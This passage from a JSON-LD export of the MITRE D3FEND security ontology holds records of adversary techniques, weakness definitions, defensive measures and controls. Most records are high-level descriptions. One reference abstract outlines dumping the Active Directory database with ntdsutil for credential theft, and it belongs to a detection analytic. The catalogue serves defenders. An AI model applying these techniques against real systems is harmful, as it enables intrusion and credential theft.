      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "_:Nafad5fdacef649729163b64d7e291063",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelProcessTable"
      }
    },
    {
      "@id": "_:Nd595d42c34494332ae6c4acbcff10a76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "_:N39e6b4c61fc843d0a9a61d5ede7890f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirewallConfiguration"
      }
    },
    {
      "@id": "_:N84f8dbcaca604024ae3b8ef4e7fa6b8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:T1001.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.003",
      "d3f:definition": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.",
      "rdfs:label": "Protocol or Service Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:CWE-562",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-562",
      "d3f:definition": "A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash.",
      "rdfs:label": "Return of Stack Variable Address",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:TA0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.",
      "d3f:display-order": 1,
      "rdfs:label": "Initial Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1636.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.001",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework.",
      "rdfs:label": "Calendar Entries - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Calendar Entries"
    },
    {
      "@id": "d3f:T1059.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.002",
      "d3f:definition": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.",
      "rdfs:label": "AppleScript",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:Time",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Time is the one-dimensional continuum of temporal regions within which all processes unfold and at which all continuants exist. A temporal region is a specific portion of this continuum that may be either zero-dimensional (a temporal instant) or one-dimensional (a temporal interval). Temporal regions serve as the temporal boundaries and extents for occurrents (processes, events) and provide the temporal indexing for the existence of continuants (entities that persist through time).",
      "rdfs:label": "Time",
      "rdfs:seeAlso": {
        "@id": "dbr:Time_in_physics"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:T1621",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:RemoteAuthenticationService"
      },
      "d3f:attack-id": "T1621",
      "d3f:definition": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.",
      "rdfs:label": "Multi-Factor Authentication Request Generation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Naf4042a202f84681b76811adb53b6665"
        }
      ]
    },
    {
      "@id": "_:Naf4042a202f84681b76811adb53b6665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteAuthenticationService"
      }
    },
    {
      "@id": "d3f:ST0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to steal information.",
      "d3f:display-order": 8,
      "rdfs:label": "Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:AccessControlGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A collection of objects that can have access controls placed on them.",
      "d3f:restricted-by": {
        "@id": "d3f:AccessControlList"
      },
      "rdfs:label": "Access Control Group",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/group"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "_:N2c394f1543b14761bdf9f50b40624fc9"
        }
      ]
    },
    {
      "@id": "_:N2c394f1543b14761bdf9f50b40624fc9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricted-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlList"
      }
    },
    {
      "@id": "d3f:ATTACKICSPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0110"
      },
      "rdfs:label": "Persistence Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Ncbc9426b92b946869bddc6ea1b27dccd"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:Ncbc9426b92b946869bddc6ea1b27dccd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0110"
      }
    },
    {
      "@id": "d3f:CWE-451",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-451",
      "d3f:definition": "The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.",
      "rdfs:label": "User Interface (UI) Misrepresentation of Critical Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-684"
        }
      ]
    },
    {
      "@id": "d3f:PointerDereferencingFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": [
        {
          "@id": "d3f:MemoryBlock"
        },
        {
          "@id": "d3f:Pointer"
        }
      ],
      "d3f:definition": "A function which has an operation which dereferences a pointer.",
      "rdfs:comment": "Note, this is not the actual code which performs the dereferencing operation internal to an application runtime.",
      "rdfs:label": "Pointer Dereferencing Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nfad437cd143d477c8d12c9c563ccdafb"
        },
        {
          "@id": "_:N9130a9c379404f31833f762bf978aad1"
        }
      ]
    },
    {
      "@id": "_:Nfad437cd143d477c8d12c9c563ccdafb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "_:N9130a9c379404f31833f762bf978aad1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:SymbolicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SL",
      "d3f:definition": "Symbolic Logic, also known as formal logic, is a branch of mathematics that uses symbolic representations for logical expressions and relationships. It provides a systematic method for examining the structure of arguments and reasoning, focusing on the relationships between propositions rather than the content of those propositions.",
      "d3f:kb-article": "## How it Works\n\n## References\n1. Symbolic Logic. (2023, June 6). In _Wolfram Mathworld_. [Link](https://mathworld.wolfram.com/SymbolicLogic.html)\n2. Hughes, G. and Schagrin, M. (2023, Apr 19). Formal Logic. _Encyclopedia Britannica_. [Link](https://www.britannica.com/topic/formal-logic)\n3. Carnap, R. (1953). Introduction to Symbolic Logic and Its Applications. Dover Publications. [Link](https://archive.org/details/rudolf-carnap-introduction-to-symbolic-logic-and-its-applications/page/3/mode/2up)",
      "rdfs:label": "Symbolic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:MemoryDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing activity in primary storage devices, such as DRAM or SRAM memory initialization, reconfiguration, or failures.",
      "rdfs:label": "Memory Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:Nae6183a6e54545929862fcc99ec55634"
        }
      ]
    },
    {
      "@id": "_:Nae6183a6e54545929862fcc99ec55634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:Reference-DYNAMICBASE_UseAddressSpaceLayoutRandomization_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=vs-2019"
      },
      "d3f:kb-author": "Microsoft",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:SegmentAddressOffsetRandomization"
      },
      "d3f:kb-reference-title": "/DYNAMICBASE (Use address space layout randomization)",
      "rdfs:label": "Reference - /DYNAMICBASE (Use address space layout randomization) - Microsoft Docs"
    },
    {
      "@id": "d3f:ThreadStartFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A function which invokes a create thread system call.",
      "d3f:executes": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Thread Start Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Ncf3c80711995454e9e23a5195d860148"
        }
      ]
    },
    {
      "@id": "_:Ncf3c80711995454e9e23a5195d860148",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:LANAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LANAccessMediation"
      ],
      "d3f:d3fend-id": "D3-LAMED",
      "d3f:definition": "LAN access mediation encompasses the application of strict access control policies, systematic verification of devices, and authentication mechanisms to govern connectivity to a Local Area Network.",
      "d3f:isolates": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "d3f:kb-article": "## How it works\n\nLAN Access Mediation is a network security approach that manages and controls access to a Local Area Network by using key components such as Access Control Lists (ACLs) to specify which devices are allowed or denied access, Port Security to restrict device connections to specific switch ports, RADIUS for determining the level of access or specific resources available to users or devices, and 802.1X for enforcing device authentication before granting network access. This comprehensive strategy ensures that only authorized devices and users can connect to the network, enhancing overall security.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "rdfs:comment": "Layer 2 Enforcement",
      "rdfs:label": "LAN Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v2.0(U)_Sep22.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "_:Ndc344869922b455a9fc179c1692937fa"
        }
      ]
    },
    {
      "@id": "_:Ndc344869922b455a9fc179c1692937fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:ComputingSnapshot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer systems, a snapshot is the state of a system at a particular point in time.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Snapshot_(computer_storage)"
      },
      "rdfs:label": "Computing Snapshot",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Snapshot"
    },
    {
      "@id": "d3f:M1037",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:NetworkIsolation"
      },
      "rdfs:label": "Filter Network Traffic"
    },
    {
      "@id": "d3f:REC-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.03",
      "d3f:definition": "In proximity scenarios, an adversary platform (or co-located payload) attempts to observe emissions and intra-vehicle traffic at close range, RF side-channels, optical/lasercom leakage, and, in extreme cases, electromagnetic emanations consistent with TEMPEST/EMSEC concerns. Physical proximity can expose harmonics, intermodulation products, local oscillators, and bus activity that are undetectable from the ground, enabling reconstruction of timing, command acceptance windows, or even limited protocol content. In hosted-payload or rideshare contexts, a poorly segregated data path may permit passive observation of TT&C gateways, crosslinks, or payload buses.",
      "rdfs:label": "Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Proximity Operations"
    },
    {
      "@id": "d3f:Record",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a record (also called struct or compound data) is a basic data structure. A record is a collection of fields, possibly of different data types, typically in fixed number and sequence. The fields of a record may also be called members, particularly in object-oriented programming. Fields may also be called elements, though these risk confusion with the elements of a collection. A tuple may or may not be considered a record, and vice versa, depending on conventions and the specific programming language.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Record_(computer_science)"
      },
      "rdfs:label": "Record",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:has-procedure",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-procedure",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-general-object-property"
      }
    },
    {
      "@id": "d3f:RubyScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Ruby Script File"
    },
    {
      "@id": "d3f:ATTACKICSThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:SystemDaemonMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemDaemonMonitoring"
      ],
      "d3f:d3fend-id": "D3-SDM",
      "d3f:definition": "Tracking changes to the state or configuration of critical system level processes.",
      "d3f:kb-article": "## How it works\nAttackers may manipulate system settings or services to disable system logging or monitoring of security tools and events. Firewall and antivirus services are popular targets for attackers. Disabling system logs will also allow an attacker's actions to go unnoticed. Analysis of logs, registries, and process monitoring help defenders locate signs of tampering. Two possible approaches are to monitor hardened system services or to monitor registry updates for modifications to security settings.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-MethodUsingKernelModeAssistanceForTheDetectionAndRemovalOfThreatsWhichAreActivelyPreventingDetectionAndRemovalFromARunningSystem_SymantecCorporation"
        },
        {
          "@id": "d3f:Reference-UserActivityFromStoppingWindowsDefensiveServices_MITRE"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "rdfs:label": "System Daemon Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nf53a78f381224df0833f94f64cee39d9"
        }
      ]
    },
    {
      "@id": "_:Nf53a78f381224df0833f94f64cee39d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "d3f:CWE-238",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-238",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular structural element is not completely specified.",
      "rdfs:label": "Improper Handling of Incomplete Structural Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-237"
      }
    },
    {
      "@id": "d3f:CWE-90",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-90",
      "d3f:definition": "The product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-943"
      }
    },
    {
      "@id": "d3f:T1218.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.009",
      "d3f:definition": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)",
      "rdfs:label": "Regsvcs/Regasm",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-651",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-651",
      "d3f:definition": "The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return).",
      "rdfs:label": "Exposure of WSDL File Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
      "@id": "d3f:CWE-1220",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1220",
      "d3f:definition": "The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.",
      "rdfs:label": "Insufficient Granularity of Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:DS0016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter",
      "rdfs:comment": "This data source captures events relating to drives and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Drive (ATT&CK DS)"
    },
    {
      "@id": "d3f:deceives-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x deceives-with y: The entity x misleads or manipulates another entity using y as a tool, method, or mechanism to create false perceptions or understanding.",
      "rdfs:label": "deceives-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-tactical-verb-property"
      }
    },
    {
      "@id": "d3f:TA0043",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.",
      "d3f:display-order": -1,
      "rdfs:label": "Reconnaissance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:DigitalCamera",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An optical instrument that can capture an image. A digital camera captures photographs in digital memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Digital_camera"
      },
      "rdfs:label": "Digital Camera",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T0841",
      "@type": "owl:Class",
      "d3f:attack-id": "T0841",
      "d3f:definition": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [specific port numbers](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml), the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most popular tools to use for Network Service Scanning is [Nmap](https://nmap.org/).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Network Service Scanning - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Service Scanning"
    },
    {
      "@id": "d3f:DS0035",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Internet Scan (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-694",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-694",
      "d3f:definition": "The product uses multiple resources that can have the same identifier, in a context in which unique identifiers are required.",
      "rdfs:label": "Use of Multiple Resources with Duplicate Identifier",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-99"
        }
      ]
    },
    {
      "@id": "d3f:T1499.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.001",
      "d3f:definition": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.",
      "rdfs:label": "OS Exhaustion Flood",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:AML.T0004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0004",
      "d3f:definition": "Adversaries may search open application repositories during targeting.\nExamples of these include Google Play, the iOS App Store, the macOS App Store, and the Microsoft Store.\n\nAdversaries may craft search queries seeking applications that contain AI-enabled components.\nFrequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).",
      "rdfs:label": "Search Application Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Application Repositories"
    },
    {
      "@id": "d3f:CWE-1351",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1351",
      "d3f:definition": "A hardware device, or the firmware running on it, is missing or has incorrect protection features to maintain goals of security primitives when the device is cooled below standard operating temperatures.",
      "rdfs:label": "Improper Handling of Hardware Behavior in Exceptionally Cold Environments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:CCI-002218_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides access from a single device to computing platforms, applications, or data residing on multiple different security domains, while preventing any information flow between the different security domains.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002218"
    },
    {
      "@id": "d3f:T1659",
      "@type": "owl:Class",
      "d3f:attack-id": "T1659",
      "d3f:definition": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems. (Citation: ESET MoustachedBouncer)",
      "rdfs:label": "Content Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "d3f:InitialAccessTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-862",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-862",
      "d3f:definition": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action.",
      "d3f:synonym": "AuthZ",
      "rdfs:comment": "Broad and could apply to all resource accesses.",
      "rdfs:label": "Missing Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:CWE-126",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-126",
      "d3f:definition": "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer.",
      "rdfs:label": "Buffer Over-read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-125"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000804_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:One-timePassword"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000804"
    },
    {
      "@id": "d3f:T0856",
      "@type": "owl:Class",
      "d3f:attack-id": "T0856",
      "d3f:definition": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.",
      "rdfs:label": "Spoof Reporting Message - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        }
      ],
      "skos:prefLabel": "Spoof Reporting Message"
    },
    {
      "@id": "d3f:T0803",
      "@type": "owl:Class",
      "d3f:attack-id": "T0803",
      "d3f:definition": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
      "rdfs:label": "Block Command Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Command Message"
    },
    {
      "@id": "d3f:Reference-ActiveDirectoryDumpingViaNTDSUtil_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-08-002/"
      },
      "d3f:kb-abstract": "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching ntdsutil.exe as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, ntds.dit, to the specified folder path.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-08-002: Active Directory Dumping via NTDSUtil",
